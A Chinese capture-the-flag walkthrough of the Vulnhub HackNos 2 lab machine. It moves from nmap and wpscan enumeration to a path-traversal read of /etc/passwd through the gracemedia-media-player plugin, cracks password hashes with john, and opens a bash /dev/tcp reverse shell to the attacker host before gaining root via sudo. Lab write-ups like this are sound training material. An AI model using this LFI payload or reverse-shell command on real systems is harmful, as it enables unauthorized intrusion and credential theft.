首页 > 其他分享 >Vulnhub之HackNos 2靶机详细测试过程

Vulnhub之HackNos 2靶机详细测试过程

时间:2023-03-25 10:11:18浏览次数:43  
标签:56.254 HackNos 192.168 flag Vulnhub http 靶机 root usr

HackNos 2

作者:jason huawen

靶机信息

名称:hackNos: Os-hackNos-2.1

地址:

https://www.vulnhub.com/entry/hacknos-os-hacknos-21,403/

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:8e:0a:96      1      60  PCS Systemtechnik GmbH                                                   
 192.168.56.254  08:00:27:0a:ef:c3      1      60  PCS Systemtechnik GmbH    

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.254

NMAP扫描

──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-24 20:58 EDT
Nmap scan report for localhost (192.168.56.254)
Host is up (0.000069s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94364e716a83e2c11ea9526445f62980 (RSA)
|   256 b4ce5ac33f4052a6efdcd829f32cb5d1 (ECDSA)
|_  256 096c17a1a3b4c778b9adecde8f64b17b (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:0A:EF:C3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds

NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ nikto -h http://192.168.56.254
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.254
+ Target Hostname:    192.168.56.254
+ Target Port:        80
+ Start Time:         2023-03-24 21:00:45 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5978e3d67036e, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS 
+ Uncommon header 'link' found, with multiple values: (<http://192.168.56.254/tsweb/index.php/wp-json/>; rel="https://api.w.org/",<http://192.168.56.254/tsweb/>; rel=shortlink,)
+ /tsweb/: Microsoft TSAC found. http://www.dslwebserver.com/main/fr_index.html?/main/sbs-Terminal-Services-Advanced-Client-Configuration.html
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2023-03-24 21:01:35 (GMT-4) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

nikto工具识别到/tsweb/目录,访问该目录,从返回页面可知该站点为wordpress

──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ gobuster dir -u http://192.168.56.254 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.254
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              sh,php,js,html,txt
[+] Timeout:                 10s
===============================================================
2023/03/24 21:03:25 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 10918]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1313804 / 1323366 (99.28%)===============================================================
2023/03/24 21:04:25 Finished
===============================================================
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ gobuster dir -u http://192.168.56.254/tsweb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.254/tsweb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,txt,sh,php,js
[+] Timeout:                 10s
===============================================================
2023/03/24 21:10:22 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.php            (Status: 301) [Size: 0] [--> http://192.168.56.254/tsweb/]
/wp-content           (Status: 301) [Size: 327] [--> http://192.168.56.254/tsweb/wp-content/]
/wp-login.php         (Status: 200) [Size: 5654]
/license.txt          (Status: 200) [Size: 19935]
/wp-includes          (Status: 301) [Size: 328] [--> http://192.168.56.254/tsweb/wp-includes/]
/readme.html          (Status: 200) [Size: 7368]
/wp-trackback.php     (Status: 200) [Size: 135]
/wp-admin             (Status: 301) [Size: 325] [--> http://192.168.56.254/tsweb/wp-admin/]
/xmlrpc.php           (Status: 405) [Size: 42]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/wp-signup.php        (Status: 302) [Size: 0] [--> http://192.168.56.254/tsweb/wp-login.php?action=register]
Progress: 1319393 / 1323366 (99.70%)===============================================================
2023/03/24 21:11:24 Finished
==============================================================

接下来用wpscan工具扫描站点,看是否可以识别出用户名和插件可被利用。

┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ wpscan --url http://192.168.56.254/tsweb/ -e u,p
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.254/tsweb/ [192.168.56.254]
[+] Started: Fri Mar 24 21:12:36 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.56.254/tsweb/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.56.254/tsweb/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.56.254/tsweb/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.56.254/tsweb/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3 identified (Insecure, released on 2019-11-12).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.168.56.254/tsweb/index.php/feed/, <generator>https://wordpress.org/?v=5.3</generator>
 |  - http://192.168.56.254/tsweb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://192.168.56.254/tsweb/wp-content/themes/twentytwenty/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | Readme: http://192.168.56.254/tsweb/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 2.1
 | Style URL: http://192.168.56.254/tsweb/wp-content/themes/twentytwenty/style.css?ver=1.0
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.56.254/tsweb/wp-content/themes/twentytwenty/style.css?ver=1.0, Match: 'Version: 1.0'

[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] gracemedia-media-player
 | Location: http://192.168.56.254/tsweb/wp-content/plugins/gracemedia-media-player/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2013-07-21T15:09:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.56.254/tsweb/wp-content/plugins/gracemedia-media-player/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.56.254/tsweb/wp-content/plugins/gracemedia-media-player/readme.txt

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] user
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.56.254/tsweb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Mar 24 21:12:39 2023
[+] Requests Done: 55
[+] Cached Requests: 6
[+] Data Sent: 14.627 KB
[+] Data Received: 449.523 KB
[+] Memory used: 242.609 MB
[+] Elapsed time: 00:00:03

wpscan工具识别出用户名user,以及插件:gracemedia-media-player,该插件有漏洞可利用本地文件包含漏洞,在尝试利用该漏洞之前,看是否可以破解出user的密码:

https://www.exploit-db.com/exploits/46537
─(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ wpscan --url http://192.168.56.254/tsweb/ -U user -P /usr/share/wordlists/rockyou.txt

运行了17分钟仍然无果,暂时放弃。

接下来看如何利用插件的漏洞,漏洞利用位置:

/wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

http://192.168.56.254/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd

得到返回内容:

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin syslog:x:102:106::/home/syslog:/usr/sbin/nologin messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin pollinate:x:109:1::/var/cache/pollinate:/bin/false sshd:x:110:65534::/run/sshd:/usr/sbin/nologin rohit:x:1000:1000:hackNos:/home/rohit:/bin/bash mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/:1001:1003::/home/flag:/bin/rbash 
flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/

用john破解

┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt flag_hash 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
topsecret        (?)     
1g 0:00:00:00 DONE (2023-03-24 21:44) 12.50g/s 81600p/s 81600c/s 81600C/s heybaby..nick123
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ cat flag_hash 
$1$flag$vqjCxzjtRc7PofLYS2lWf/

──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ ssh [email protected]                                         
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:rIQkBhqHj9tWiuhz+gMT5Zzwq4h/22qu5apja7gnWY8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Mar 25 01:45:33 UTC 2023

  System load:  0.07              Processes:             126
  Usage of /:   48.6% of 9.78GB   Users logged in:       0
  Memory usage: 30%               IP address for enp0s3: 192.168.56.254
  Swap usage:   0%


5 packages can be updated.
0 updates are security updates.



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Could not chdir to home directory /home/flag: No such file or directory
flag@hacknos:/$ id
uid=1001(flag) gid=1003(flag) groups=1003(flag)
flag@hacknos:/$ 

成功登录到用户flag

flag@hacknos:/$ cd /home
-rbash: cd: restricted
flag@hacknos:/$ 

这是一个受限的shell

用下述方法spawn一个新的shell

flag@hacknos:/$ bash -c 'bash -i >& /dev/tcp/192.168.56.206/5555 0>&1'
┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ sudo nc -nlvp 5555
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 52720
flag@hacknos:/$ id
id
uid=1001(flag) gid=1003(flag) groups=1003(flag)
flag@hacknos:/$ cd /home
cd /home
flag@hacknos:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root  root  4.0K Nov 17  2019 .
drwxr-xr-x 24 root  root  4.0K Nov 17  2019 ..
drwxr-x--x  4 rohit rohit 4.0K Nov 17  2019 rohit
flag@hacknos:/home$ cd rohit
cd rohit
flag@hacknos:/home/rohit$ ls -alh
ls -alh
ls: cannot open directory '.': Permission denied
flag@hacknos:/home/rohit$ cd ..
cd ..
flag@hacknos:/home$ 

flag@hacknos:/var/backups/passbkp$ cat md5-hash
cat md5-hash
$1$rohit$01Dl0NQKtgfeL08fGrggi0

再用john工具破解

┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ vim md5_hash 
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/HackNos2]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt md5_hash 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!%hack41         (?)     
1g 0:00:01:03 DONE (2023-03-24 21:53) 0.01563g/s 220430p/s 220430c/s 220430C/s !(3(r3@m..!##^%^
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

这应该是用户rohit的密码,切换到该用户:

flag@hacknos:/var/backups/passbkp$ su - rohit
su - rohit
su: must be run from a terminal
flag@hacknos:/var/backups/passbkp$ which python
which python
/usr/bin/python
flag@hacknos:/var/backups/passbkp$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
flag@hacknos:/var/backups/passbkp$ su - rohit
su - rohit
Password: !%hack41

rohit@hacknos:~$ id
id
uid=1000(rohit) gid=1000(rohit) groups=1000(rohit),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
rohit@hacknos:~$ 

提权

rohit@hacknos:~$ sudo -l
sudo -l
[sudo] password for rohit: !%hack41

Matching Defaults entries for rohit on hacknos:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User rohit may run the following commands on hacknos:
    (ALL : ALL) ALL
rohit@hacknos:~$ sudo /bin/bash
sudo /bin/bash
root@hacknos:~# cd /root
cd /root
root@hacknos:/root# ls -alh
ls -alh
total 48K
drwx------  5 root root 4.0K Nov 17  2019 .
drwxr-xr-x 24 root root 4.0K Nov 17  2019 ..
-rw-------  1 root root 1.9K Nov 17  2019 .bash_history
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwx------  2 root root 4.0K Nov 17  2019 .cache
drwx------  3 root root 4.0K Nov 17  2019 .gnupg
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root 1.1K Nov 17  2019 root.txt
drwx------  2 root root 4.0K Nov 17  2019 .ssh
-rw-------  1 root root  11K Nov 17  2019 .viminfo
root@hacknos:/root# cat root.txt
cat root.txt
 _______                         __              __  __     #
/       \                       /  |            /  |/  |    #
$$$$$$$  |  ______    ______   _$$ |_          _$$ |$$ |_   #
$$ |__$$ | /      \  /      \ / $$   |        / $$  $$   |  #
$$    $$< /$$$$$$  |/$$$$$$  |$$$$$$/         $$$$$$$$$$/   #
$$$$$$$  |$$ |  $$ |$$ |  $$ |  $$ | __       / $$  $$   |  # 
$$ |  $$ |$$ \__$$ |$$ \__$$ |  $$ |/  |      $$$$$$$$$$/   #
$$ |  $$ |$$    $$/ $$    $$/   $$  $$/         $$ |$$ |    #
$$/   $$/  $$$$$$/   $$$$$$/     $$$$/          $$/ $$/     #
#############################################################                                                          
                                                          
#############################################################                                                          
MD5-HASH : bae11ce4f67af91fa58576c1da2aad4b

Blog : www.hackNos.com

Author : Rahul Gehlaut

linkedin : https://www.linkedin.com/in/rahulgehlaut/
#############################################################
root@hacknos:/root# 

至此提权成功,并拿到了root flag

标签:56.254,HackNos,192.168,flag,Vulnhub,http,靶机,root,usr
From: https://www.cnblogs.com/jason-huawen/p/17254209.html

相关文章

  • 靶机练习8: decoy
    靶机地址https://www.vulnhub.com/entry/sunset-decoy,505/信息收集全端口扫描发现服务,并扫描其版本sudomasscan-p1-65535,U:1-65535172.16.33.40--rate=5000-et......
  • 靶机联系7:LOLY
    靶机地址https://www.vulnhub.com/entry/loly-1,538/信息收集扫描全端口,进行服务发现nmap-n-v-sS-max-retries=0-p-172.16.33.25发现只有80端口的web服务进......
  • Vulnhub之Panabee靶机详细测试过程
    Panabee识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|......
  • Vulnhub之Photographer靶机详细测试过程
    Photographer识别目标主机IP地址sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts......
  • Vulnhub:Mr-Robot:1靶机
    kali:192.168.111.111靶机:192.168.111.237信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.237访问robots.txt,发现两个文件发现fsocity.d......
  • Vulnhub之Player 1靶机详细测试过程
    Player1识别目标主机IP地址kali㉿kali)-[~/Desktop/Vulnhub/Player]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|......
  • Vulnhub之PowerGrid详细测试过程
    PowerGrid识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/PowerGrid]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24......
  • vulnhub靶场之BLUESMOKE: DEVRANDOM2|bluesmoke
    准备:攻击机:虚拟机kali、本机win10。靶机:Bluesmoke:devrandom2,下载地址:https://download.vulnhub.com/bluesmoke/Bluesmoke.ova,下载后直接vbox打开即可。知识点:ssti注入......
  • Vulnhub之Predential(部分)靶机测试过程
    Predential识别目标主机IP地址(kali㉿kali)-[~/Vulnhub/Predential]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|S......
  • Vulnhub:pWnOS 2.0靶机
    kali:192.168.111.111靶机:192.168.111.235信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.235访问网站blog目录在源码处发现cms信息为:Si......